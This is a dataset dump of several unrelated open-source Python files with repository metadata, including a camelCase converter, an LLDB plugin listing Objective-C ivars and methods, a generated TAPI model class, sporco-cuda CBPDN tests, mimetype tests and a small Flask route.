c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
3
2019-06-26T12:50:38.000Z
2020-02-16T17:19:45.000Z
csr/snake_case.py
AlexJanse/python_csr2transmart
c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
46
2019-08-15T12:25:58.000Z
2022-01-11T12:54:53.000Z
csr/snake_case.py
AlexJanse/python_csr2transmart
c01a76dfa6ecfa4248b274144092ccc6c31aab5a
[ "MIT" ]
3
2019-10-30T12:41:58.000Z
2021-11-08T13:06:32.000Z
import re camel_case_to_snake_case_pattern = re.compile('(?!^)([A-Z]+)') def camel_case_to_snake_case(camel_case_text: str) -> str: return camel_case_to_snake_case_pattern.sub(r'_\1', camel_case_text).lower()
27
80
0.75463
37
216
3.891892
0.486486
0.3125
0.229167
0.333333
0.513889
0.375
0
0
0
0
0
0.005102
0.092593
216
7
81
30.857143
0.729592
0
0
0
0
0
0.074074
0
0
0
0
0
0
1
0.25
false
0
0.25
0.25
0.75
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
7
c87701a43a537ade37b84aa8a660c375f05b4222
6,235
py
Python
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
464
2018-10-04T06:57:54.000Z
2022-03-31T06:27:54.000Z
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
31
2019-07-04T08:42:33.000Z
2022-03-21T20:49:57.000Z
src/xobjc.py
MustangYM/xia0LLDB
3c494dd86582f99966b5091af073c3c3033d733a
[ "Info-ZIP" ]
92
2019-07-03T02:50:55.000Z
2022-03-26T06:35:56.000Z
#! /usr/bin/env python3 # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| # _ ___ _ _ _____ ____ # (_) / _ \| | | | | __ \| _ \ # __ ___ __ _| | | | | | | | | | | |_) | # \ \/ / |/ _` | | | | | | | | | | | _ < # > <| | (_| | |_| | |____| |____| |__| | |_) | # /_/\_\_|\__,_|\___/|______|______|_____/|____/ # ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ ______ # |______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______|______| import lldb import os import shlex import optparse import json import re import utils def __lldb_init_module(debugger, internal_dict): debugger.HandleCommand('command script add -f xobjc.ivars ivars -h "ivars made by xia0"') debugger.HandleCommand('command script add -f xobjc.methods methods -h "methods made by xia0"') debugger.HandleCommand('command script add -f xobjc.xivars xivars -h "ivars made by xia0 for macOS or ivars not work"') debugger.HandleCommand('command script add -f xobjc.xmethods xmethods -h "methods made by xia0 for macOS or methods not work"') def ivars(debugger, command, exe_ctx, result, internal_dict): def generate_option_parser(): usage = "usage: xmethods" parser = optparse.OptionParser(usage=usage, prog="lookup") parser.add_option("-n", "--name", action="store", default=None, dest="name", help="set the class name for methods") return parser command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return _ = exe_ctx.target _ = exe_ctx.thread if options.name: clzname = options.name clzname = re.search("^\"(.*)\"$", clzname).group(1) utils.ILOG("will get methods for class:\"{}\"".format(clzname)) code = ''' Class clz = objc_getClass(\"{}\"); id ret = [clz _ivarDescription]; ret '''.format(clzname) ret = utils.exe_script(debugger, code) result.AppendMessage(ret) return result clz = args[0] code = ''' id ret = [{} _ivarDescription]; ret '''.format(clz) ret = utils.exe_script(debugger, code) result.AppendMessage(ret) return result def methods(debugger, command, exe_ctx, result, internal_dict): def generate_option_parser(): usage = "usage: xmethods" parser = optparse.OptionParser(usage=usage, prog="lookup") parser.add_option("-n", "--name", action="store", default=None, dest="name", help="set the class name for methods") return parser command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return _ = exe_ctx.target _ = exe_ctx.thread if options.name: clzname = options.name try: clzname = re.search("^\"(.*)\"$", clzname).group(1) except: utils.ELOG("input format error! need \"class name\"") return utils.ILOG("will get methods for class:\"{}\"".format(clzname)) code = ''' Class clz = objc_getClass(\"{}\"); id ret = [clz _shortMethodDescription]; ret '''.format(clzname) ret = utils.exe_script(debugger, code) result.AppendMessage(ret) return result clz = args[0] code = ''' id ret = [{} _shortMethodDescription]; ret '''.format(clz) ret = utils.exe_script(debugger, code) result.AppendMessage(ret) return result def xivars(debugger, command, exe_ctx, result, internal_dict): def generate_option_parser(): usage = "usage: xivars" parser = optparse.OptionParser(usage=usage, prog="lookup") parser.add_option("-a", "--address", action="store", default=None, dest="address", help="set a breakpoint at absolute address") return parser command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return _ = exe_ctx.target _ = exe_ctx.thread result.AppendMessage("command is still developing. please wait...\n") return parser def xmethods(debugger, command, exe_ctx, result, internal_dict): def generate_option_parser(): usage = "usage: xmethods" parser = optparse.OptionParser(usage=usage, prog="lookup") parser.add_option("-a", "--address", action="store", default=None, dest="address", help="set a breakpoint at absolute address") return parser command_args = shlex.split(command, posix=False) parser = generate_option_parser() try: (options, args) = parser.parse_args(command_args) except: result.SetError(parser.usage) return _ = exe_ctx.target _ = exe_ctx.thread result.AppendMessage("command is still developing. please wait...\n") return parser
32.989418
165
0.557338
552
6,235
5.293478
0.186594
0.024641
0.054757
0.046543
0.874059
0.864476
0.831622
0.80219
0.80219
0.80219
0
0.002156
0.330393
6,235
189
166
32.989418
0.697725
0.147554
0
0.838235
0
0.014706
0.22017
0.017719
0
0
0
0
0
1
0.066176
false
0
0.051471
0
0.227941
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
c8a77a3bfab963036b1730a018da62cab289cf35
10,686
py
Python
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
57
2018-04-09T08:56:18.000Z
2022-03-23T08:31:06.000Z
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
143
2016-06-08T04:09:54.000Z
2018-02-23T10:45:59.000Z
RI/flask_server/tapi_server/models/tapi_photonic_media_total_power_threshold_pac.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
64
2018-03-07T07:55:17.000Z
2022-03-28T07:14:28.000Z
# coding: utf-8 from __future__ import absolute_import from datetime import date, datetime # noqa: F401 from typing import List, Dict # noqa: F401 from tapi_server.models.base_model_ import Model from tapi_server import util class TapiPhotonicMediaTotalPowerThresholdPac(Model): """NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech). Do not edit the class manually. """ def __init__(self, total_power_upper_warn_threshold_default=None, total_power_lower_warn_threshold_min=None, total_power_upper_warn_threshold_min=None, total_power_upper_warn_threshold_max=None, total_power_lower_warn_threshold_max=None, total_power_lower_warn_threshold_default=None): # noqa: E501 """TapiPhotonicMediaTotalPowerThresholdPac - a model defined in OpenAPI :param total_power_upper_warn_threshold_default: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_upper_warn_threshold_default: str :param total_power_lower_warn_threshold_min: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_lower_warn_threshold_min: str :param total_power_upper_warn_threshold_min: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_upper_warn_threshold_min: str :param total_power_upper_warn_threshold_max: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_upper_warn_threshold_max: str :param total_power_lower_warn_threshold_max: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_lower_warn_threshold_max: str :param total_power_lower_warn_threshold_default: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :type total_power_lower_warn_threshold_default: str """ self.openapi_types = { 'total_power_upper_warn_threshold_default': str, 'total_power_lower_warn_threshold_min': str, 'total_power_upper_warn_threshold_min': str, 'total_power_upper_warn_threshold_max': str, 'total_power_lower_warn_threshold_max': str, 'total_power_lower_warn_threshold_default': str } self.attribute_map = { 'total_power_upper_warn_threshold_default': 'total-power-upper-warn-threshold-default', 'total_power_lower_warn_threshold_min': 'total-power-lower-warn-threshold-min', 'total_power_upper_warn_threshold_min': 'total-power-upper-warn-threshold-min', 'total_power_upper_warn_threshold_max': 'total-power-upper-warn-threshold-max', 'total_power_lower_warn_threshold_max': 'total-power-lower-warn-threshold-max', 'total_power_lower_warn_threshold_default': 'total-power-lower-warn-threshold-default' } self._total_power_upper_warn_threshold_default = total_power_upper_warn_threshold_default self._total_power_lower_warn_threshold_min = total_power_lower_warn_threshold_min self._total_power_upper_warn_threshold_min = total_power_upper_warn_threshold_min self._total_power_upper_warn_threshold_max = total_power_upper_warn_threshold_max self._total_power_lower_warn_threshold_max = total_power_lower_warn_threshold_max self._total_power_lower_warn_threshold_default = total_power_lower_warn_threshold_default @classmethod def from_dict(cls, dikt) -> 'TapiPhotonicMediaTotalPowerThresholdPac': """Returns the dict as a model :param dikt: A dict. :type: dict :return: The tapi.photonic.media.TotalPowerThresholdPac of this TapiPhotonicMediaTotalPowerThresholdPac. # noqa: E501 :rtype: TapiPhotonicMediaTotalPowerThresholdPac """ return util.deserialize_model(dikt, cls) @property def total_power_upper_warn_threshold_default(self): """Gets the total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the default threshold that was set # noqa: E501 :return: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_upper_warn_threshold_default @total_power_upper_warn_threshold_default.setter def total_power_upper_warn_threshold_default(self, total_power_upper_warn_threshold_default): """Sets the total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the default threshold that was set # noqa: E501 :param total_power_upper_warn_threshold_default: The total_power_upper_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_upper_warn_threshold_default: str """ self._total_power_upper_warn_threshold_default = total_power_upper_warn_threshold_default @property def total_power_lower_warn_threshold_min(self): """Gets the total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the lower threshold that was set # noqa: E501 :return: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_lower_warn_threshold_min @total_power_lower_warn_threshold_min.setter def total_power_lower_warn_threshold_min(self, total_power_lower_warn_threshold_min): """Sets the total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the lower threshold that was set # noqa: E501 :param total_power_lower_warn_threshold_min: The total_power_lower_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_lower_warn_threshold_min: str """ self._total_power_lower_warn_threshold_min = total_power_lower_warn_threshold_min @property def total_power_upper_warn_threshold_min(self): """Gets the total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the lower threshold that was set # noqa: E501 :return: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_upper_warn_threshold_min @total_power_upper_warn_threshold_min.setter def total_power_upper_warn_threshold_min(self, total_power_upper_warn_threshold_min): """Sets the total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the lower threshold that was set # noqa: E501 :param total_power_upper_warn_threshold_min: The total_power_upper_warn_threshold_min of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_upper_warn_threshold_min: str """ self._total_power_upper_warn_threshold_min = total_power_upper_warn_threshold_min @property def total_power_upper_warn_threshold_max(self): """Gets the total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the upper threshold that was set # noqa: E501 :return: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_upper_warn_threshold_max @total_power_upper_warn_threshold_max.setter def total_power_upper_warn_threshold_max(self, total_power_upper_warn_threshold_max): """Sets the total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the upper threshold that was set # noqa: E501 :param total_power_upper_warn_threshold_max: The total_power_upper_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_upper_warn_threshold_max: str """ self._total_power_upper_warn_threshold_max = total_power_upper_warn_threshold_max @property def total_power_lower_warn_threshold_max(self): """Gets the total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the upper threshold that was set # noqa: E501 :return: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_lower_warn_threshold_max @total_power_lower_warn_threshold_max.setter def total_power_lower_warn_threshold_max(self, total_power_lower_warn_threshold_max): """Sets the total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the upper threshold that was set # noqa: E501 :param total_power_lower_warn_threshold_max: The total_power_lower_warn_threshold_max of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_lower_warn_threshold_max: str """ self._total_power_lower_warn_threshold_max = total_power_lower_warn_threshold_max @property def total_power_lower_warn_threshold_default(self): """Gets the total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the default threshold that was set # noqa: E501 :return: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. :rtype: str """ return self._total_power_lower_warn_threshold_default @total_power_lower_warn_threshold_default.setter def total_power_lower_warn_threshold_default(self, total_power_lower_warn_threshold_default): """Sets the total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. Can read the value of the default threshold that was set # noqa: E501 :param total_power_lower_warn_threshold_default: The total_power_lower_warn_threshold_default of this TapiPhotonicMediaTotalPowerThresholdPac. :type total_power_lower_warn_threshold_default: str """ self._total_power_lower_warn_threshold_default = total_power_lower_warn_threshold_default
51.623188
303
0.783081
1,330
10,686
5.791729
0.061654
0.171362
0.128521
0.162794
0.914319
0.907439
0.904063
0.875893
0.848371
0.758795
0
0.007569
0.171626
10,686
206
304
51.873786
0.86263
0.514224
0
0.264706
0
0
0.155887
0.155887
0
0
0
0
0
1
0.205882
false
0
0.073529
0
0.397059
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
8
c8e2f59eabb830bff31f3690beee12eb7351ca18
11,784
py
Python
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
sporco_cuda/tests/test_cbpdn.py
young-oct/sporco-cuda
7fb2269d48842cda849293f3a0633026c601dcfa
[ "BSD-3-Clause" ]
null
null
null
from __future__ import division from builtins import object import numpy as np from sporco.admm import cbpdn import sporco_cuda.cbpdn as cucbpdn import sporco.metric as sm import sporco.signal as ss class TestSet01(object): def setup_method(self, method): np.random.seed(12345) def test_01(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDN(D, s, lmbda, opt) X1 = b.solve() X2 = cucbpdn.cbpdn(D, s, lmbda, opt) assert(sm.mse(X1, X2) < 1e-8) def test_02(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 Wl1 = np.random.randn(1, 1, M).astype(np.float32) opt = cbpdn.ConvBPDN.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDN(D, s, lmbda, opt) X1 = b.solve() X2 = cucbpdn.cbpdn(D, s, lmbda, opt) assert(sm.mse(X1, X2) < 1e-8) def test_03(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 Wl1 = np.random.randn(1, 1, M).astype(np.float32) Wl1[0] = 0.0 opt = cbpdn.ConvBPDN.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDN(D, s, lmbda, opt) X1 = b.solve() X2 = cucbpdn.cbpdn(D, s, lmbda, opt) assert(sm.mse(X1, X2) < 1e-8) def test_04(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32) opt = cbpdn.ConvBPDN.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDN(D, s, lmbda, opt) X1 = b.solve() X2 = cucbpdn.cbpdn(D, s, lmbda, opt) assert(sm.mse(X1, X2) < 1e-6) def test_05(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 mu = 1e-2 opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt) X1 = b.solve() X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_06(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 mu = 1e-2 Wgrd = np.random.randn(M).astype(np.float32) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'GradWeight': Wgrd, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt) X1 = b.solve() X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_07(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 mu = 1e-2 Wl1 = np.random.randn(1, 1, M).astype(np.float32) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt) X1 = b.solve() X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_08(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 mu = 1e-2 Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt) X1 = b.solve() X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_09(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) lmbda = 1e-1 mu = 1e-2 Wl1 = np.random.randn(Nr, Nc, M).astype(np.float32) Wgrd = np.random.randn(M).astype(np.float32) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'L1Weight': Wl1, 'GradWeight': Wgrd, 'AutoRho': {'Enabled': False}}) b = cbpdn.ConvBPDNGradReg(D, s, lmbda, mu, opt) X1 = b.solve() X2 = cucbpdn.cbpdngrd(D, s, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_10(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) frc = 0.5 msk = ss.rndmask(s.shape, frc, dtype=np.float32) s *= msk lmbda = 1e-1 opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) b = cbpdn.AddMaskSim(cbpdn.ConvBPDN, D, s, msk, lmbda, opt=opt) X1 = b.solve() X2 = cucbpdn.cbpdnmsk(D, s, msk, lmbda, opt) assert(sm.mse(X1, X2) < 1e-8) def test_11(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) frc = 0.5 msk = ss.rndmask(s.shape, frc, dtype=np.float32) s *= msk lmbda = 1e-1 # Create a random ℓ1 term weighting array. There is no need to # extend this array to account for the AMS impulse filter since # this is taken care of automatically by cucbpdn.cbpdnmsk Wl1 = np.random.randn(1, 1, M).astype(np.float32) # Append a zero entry to the L1Weight array, corresponding to # the impulse filter appended to the dictionary by cbpdn.AddMaskSim, # since this is not done automatically by cbpdn.AddMaskSim Wl1i = np.concatenate((Wl1, np.zeros(Wl1.shape[0:-1] + (1,))), axis=-1) opt = cbpdn.ConvBPDN.Options({'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) opt['L1Weight'] = Wl1i b = cbpdn.AddMaskSim(cbpdn.ConvBPDN, D, s, msk, lmbda, opt=opt) X1 = b.solve() opt['L1Weight'] = Wl1 X2 = cucbpdn.cbpdnmsk(D, s, msk, lmbda, opt) assert(sm.mse(X1, X2) < 1e-8) def test_12(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) frc = 0.5 msk = ss.rndmask(s.shape, frc, dtype=np.float32) s *= msk lmbda = 1e-1 mu = 1e-2 # Since cucbpdn.cbpdngrdmsk automatically ensures that the ℓ2 of # gradient term is not applied to the AMS impulse filter, while # cbpdn.AddMaskSim does not, we have to pass a GradWeight array # with a zero entry corresponding to the AMS impulse filter to # cbpdn.AddMaskSim Wgrdi = np.hstack((np.ones(M,), np.zeros((1,)))) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) opt['GradWeight'] = Wgrdi b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt) X1 = b.solve() opt['GradWeight'] = 1.0 X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_13(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) frc = 0.5 msk = ss.rndmask(s.shape, frc, dtype=np.float32) s *= msk lmbda = 1e-1 mu = 1e-2 # Create a random ℓ1 term weighting array. There is no need to # extend this array to account for the AMS impulse filter since # this is taken care of automatically by cucbpdn.cbpdngrdmsk Wl1 = np.random.randn(1, 1, M).astype(np.float32) # Append a zero entry to the L1Weight array, corresponding to # the impulse filter appended to the dictionary by cbpdn.AddMaskSim, # since this is not done automatically by cbpdn.AddMaskSim Wl1i = np.concatenate((Wl1, np.zeros(Wl1.shape[0:-1] + (1,))), axis=-1) # Since cucbpdn.cbpdngrdmsk automatically ensures that the ℓ2 of # gradient term is not applied to the AMS impulse filter, while # cbpdn.AddMaskSim does not, we have to pass a GradWeight array # with a zero entry corresponding to the AMS impulse filter to # cbpdn.AddMaskSim Wgrdi = np.hstack((np.ones(M,), np.zeros((1,)))) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) opt['L1Weight'] = Wl1i opt['GradWeight'] = Wgrdi b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt) X1 = b.solve() opt['L1Weight'] = Wl1 opt['GradWeight'] = 1.0 X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8) def test_14(self): Nr = 32 Nc = 31 Nd = 5 M = 4 D = np.random.randn(Nd, Nd, M).astype(np.float32) s = np.random.randn(Nr, Nc).astype(np.float32) frc = 0.5 msk = ss.rndmask(s.shape, frc, dtype=np.float32) s *= msk lmbda = 1e-1 mu = 1e-2 # Create a random ℓ2 of gradient term weighting array. There is no # need to extend this array to account for the AMS impulse filter # since this is taken care of automatically by cucbpdn.cbpdngrdmsk Wgrd = np.random.randn(M).astype(np.float32) # Append a zero entry to the GradWeight array, corresponding to # the impulse filter appended to the dictionary by cbpdn.AddMaskSim, # since this is not done automatically by cbpdn.AddMaskSim Wgrdi = np.hstack((Wgrd, np.zeros((1,)))) opt = cbpdn.ConvBPDNGradReg.Options( {'Verbose': False, 'MaxMainIter': 50, 'AutoRho': {'Enabled': False}}) opt['GradWeight'] = Wgrdi b = cbpdn.AddMaskSim(cbpdn.ConvBPDNGradReg, D, s, msk, lmbda, mu, opt) X1 = b.solve() opt['GradWeight'] = Wgrd X2 = cucbpdn.cbpdngrdmsk(D, s, msk, lmbda, mu, opt) assert(sm.mse(X1, X2) < 1e-8)
34.156522
78
0.538103
1,623
11,784
3.89464
0.088108
0.062648
0.080209
0.063281
0.950957
0.9489
0.9489
0.944945
0.942256
0.942256
0
0.055857
0.326969
11,784
344
79
34.255814
0.741142
0.139002
0
0.888476
0
0
0.060097
0
0
0
0
0
0.052045
1
0.055762
false
0
0.026022
0
0.085502
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
7402d9b38dad3bb1c6353daa3995ee526af370a5
352
py
Python
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
16
2020-06-30T15:35:42.000Z
2022-02-12T09:26:41.000Z
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
6
2020-07-06T08:56:33.000Z
2021-07-12T18:09:07.000Z
tests/test_mimetypes.py
daaain/onfido-python
62675c97cf7d03de2ab3ed4b07ec0bde9e2b1a5d
[ "MIT" ]
5
2020-08-18T08:12:19.000Z
2021-05-26T11:43:53.000Z
from onfido.mimetype import mimetype_from_name def test_mimetypes(): assert mimetype_from_name("filename.jpg") == "image/jpeg" assert mimetype_from_name("filename.png") == "image/png" assert mimetype_from_name("file.pdf") == "application/pdf" def test_secondary_mimetypes(): assert mimetype_from_name("filename.jpeg") == "image/jpeg"
35.2
62
0.747159
46
352
5.434783
0.391304
0.24
0.32
0.352
0.432
0.312
0
0
0
0
0
0
0.119318
352
9
63
39.111111
0.806452
0
0
0
0
0
0.252841
0
0
0
0
0
0.571429
1
0.285714
true
0
0.142857
0
0.428571
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
1
0
0
0
0
0
0
7
cdb272202dbcfa306d7a095a75e3b628968050fa
128
py
Python
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
app/controllers/mapa.py
h01000110/gerenciador-oficina-web
f86fe4ae988ac8b94aac4165efe77a29d862a1cd
[ "MIT" ]
null
null
null
from app import app from flask import render_template @app.route("/mapa") def mapa(): return render_template("mapa.html")
16
39
0.734375
19
128
4.842105
0.578947
0.304348
0
0
0
0
0
0
0
0
0
0
0.148438
128
7
40
18.285714
0.844037
0
0
0
0
0
0.109375
0
0
0
0
0
0
1
0.2
true
0
0.4
0.2
0.8
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
1
1
0
0
7
a833b27483e7f4524518625179b43d0238ee9bfb
7,551
py
Python
rdmo/projects/tests/test_view_project_create_import.py
berkerY/rdmo
